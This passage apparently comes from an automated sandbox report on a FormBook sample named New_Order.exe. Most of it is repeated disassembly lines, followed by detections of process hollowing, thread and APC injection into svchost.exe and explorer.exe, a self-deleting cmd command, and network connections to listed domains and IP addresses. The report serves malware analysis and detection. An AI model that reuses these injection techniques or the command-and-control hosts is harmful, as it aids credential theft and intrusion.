          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]7_2_048E7016
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]7_2_0493740D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]7_2_0493740D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]7_2_0493740D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]7_2_0489002D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489BC2C mov eax, dword ptr fs:[00000030h]7_2_0489BC2C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]7_2_0487B02A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]7_2_0487B02A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]7_2_0487B02A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]7_2_0487B02A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A44B mov eax, dword ptr fs:[00000030h]7_2_0489A44B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]7_2_04880050
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]7_2_04880050
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]7_2_048FC450
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]7_2_048FC450
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04922073 mov eax, dword ptr fs:[00000030h]7_2_04922073
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488746D mov eax, dword ptr fs:[00000030h]7_2_0488746D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04931074 mov eax, dword ptr fs:[00000030h]7_2_04931074
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488C182 mov eax, dword ptr fs:[00000030h]7_2_0488C182
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A185 mov eax, dword ptr fs:[00000030h]7_2_0489A185
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]7_2_04862D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]7_2_0489FD9B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]7_2_0489FD9B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892990 mov eax, dword ptr fs:[00000030h]7_2_04892990
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048935A1 mov eax, dword ptr fs:[00000030h]7_2_048935A1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E69A6 mov eax, dword ptr fs:[00000030h]7_2_048E69A6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]7_2_048961A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]7_2_048961A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]7_2_048E51BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]7_2_048E51BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]7_2_048E51BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]7_2_048E51BE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]7_2_04891DB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]7_2_04891DB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]7_2_04891DB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]7_2_049305AC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]7_2_049305AC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov ecx, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]7_2_048E6DC9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04918DF1 mov eax, dword ptr fs:[00000030h]7_2_04918DF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]7_2_0486B1E1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]7_2_0486B1E1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]7_2_0486B1E1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048F41E8 mov eax, dword ptr fs:[00000030h]7_2_048F41E8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]7_2_0487D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]7_2_0487D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]7_2_04869100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]7_2_04869100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]7_2_04869100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938D34 mov eax, dword ptr fs:[00000030h]7_2_04938D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov ecx, dword ptr fs:[00000030h]7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]7_2_04894D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]7_2_04894D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]7_2_04894D3B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]7_2_0489513A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]7_2_0489513A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]7_2_04873D34
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486AD30 mov eax, dword ptr fs:[00000030h]7_2_0486AD30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048EA537 mov eax, dword ptr fs:[00000030h]7_2_048EA537
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A3D43 mov eax, dword ptr fs:[00000030h]7_2_048A3D43
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h]7_2_0488B944
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h]7_2_0488B944
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E3540 mov eax, dword ptr fs:[00000030h]7_2_048E3540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04887D50 mov eax, dword ptr fs:[00000030h]7_2_04887D50
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486C962 mov eax, dword ptr fs:[00000030h]7_2_0486C962
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h]7_2_0486B171
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h]7_2_0486B171
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h]7_2_0488C577
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h]7_2_0488C577
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FFE87 mov eax, dword ptr fs:[00000030h]7_2_048FFE87
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h]7_2_0489D294
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h]7_2_0489D294
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]7_2_048652A5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]7_2_048652A5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]7_2_048652A5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]7_2_048652A5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]7_2_048652A5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E46A7 mov eax, dword ptr fs:[00000030h]7_2_048E46A7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]7_2_04930EA5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]7_2_04930EA5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]7_2_04930EA5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h]7_2_0487AAB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h]7_2_0487AAB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489FAB0 mov eax, dword ptr fs:[00000030h]7_2_0489FAB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892ACB mov eax, dword ptr fs:[00000030h]7_2_04892ACB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938ED6 mov eax, dword ptr fs:[00000030h]7_2_04938ED6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048936CC mov eax, dword ptr fs:[00000030h]7_2_048936CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A8EC7 mov eax, dword ptr fs:[00000030h]7_2_048A8EC7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0491FEC0 mov eax, dword ptr fs:[00000030h]7_2_0491FEC0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048776E2 mov eax, dword ptr fs:[00000030h]7_2_048776E2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048916E0 mov ecx, dword ptr fs:[00000030h]7_2_048916E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892AE4 mov eax, dword ptr fs:[00000030h]7_2_04892AE4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]7_2_0486C600
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]7_2_0486C600
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]7_2_0486C600
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04898E00 mov eax, dword ptr fs:[00000030h]7_2_04898E00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04878A0A mov eax, dword ptr fs:[00000030h]7_2_04878A0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h]7_2_0486AA16
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h]7_2_0486AA16
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04883A1C mov eax, dword ptr fs:[00000030h]7_2_04883A1C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h]7_2_0489A61C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h]7_2_0489A61C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]7_2_04865210
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04865210 mov ecx, dword ptr fs:[00000030h]7_2_04865210
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]7_2_04865210
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]7_2_04865210
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921608 mov eax, dword ptr fs:[00000030h]7_2_04921608
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486E620 mov eax, dword ptr fs:[00000030h]7_2_0486E620
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h]7_2_048A4A2C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h]7_2_048A4A2C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0491FE3F mov eax, dword ptr fs:[00000030h]7_2_0491FE3F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]7_2_04869240
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]7_2_04869240
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]7_2_04869240
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]7_2_04869240
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]7_2_04877E41
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]7_2_04877E41
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]7_2_04877E41
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]7_2_04877E41
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]7_2_04877E41
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]7_2_04877E41
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048F4257 mov eax, dword ptr fs:[00000030h]7_2_048F4257
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487766D mov eax, dword ptr fs:[00000030h]7_2_0487766D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A927A mov eax, dword ptr fs:[00000030h]7_2_048A927A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h]7_2_0491B260
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h]7_2_0491B260
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938A62 mov eax, dword ptr fs:[00000030h]7_2_04938A62
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]7_2_0488AE73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]7_2_0488AE73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]7_2_0488AE73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]7_2_0488AE73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]7_2_0488AE73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h]7_2_04871B8F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h]7_2_04871B8F
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.charmboutiques.com
          Source: C:\Windows\explorer.exeDomain query: www.shanghainternational.com
          Source: C:\Windows\explorer.exeNetwork Connect: 91.148.168.141 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.voiceclubdubai.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.websitemax.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 8.210.40.49 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.roastedorganic.com
          Source: C:\Windows\explorer.exeDomain query: www.year-action.xyz
          Source: C:\Windows\explorer.exeDomain query: www.susanestuart.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.189.71 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.w-c727or.net
          Source: C:\Windows\explorer.exeDomain query: www.kantan-sedori.com
          Source: C:\Windows\explorer.exeDomain query: www.geacasolaro.com
          Source: C:\Windows\explorer.exeDomain query: www.hdjakdhf.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 85.233.160.22 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\New_Order.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1260000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\New_Order.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EEB008Jump to behavior
          Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000000.253797902.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.495816911.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

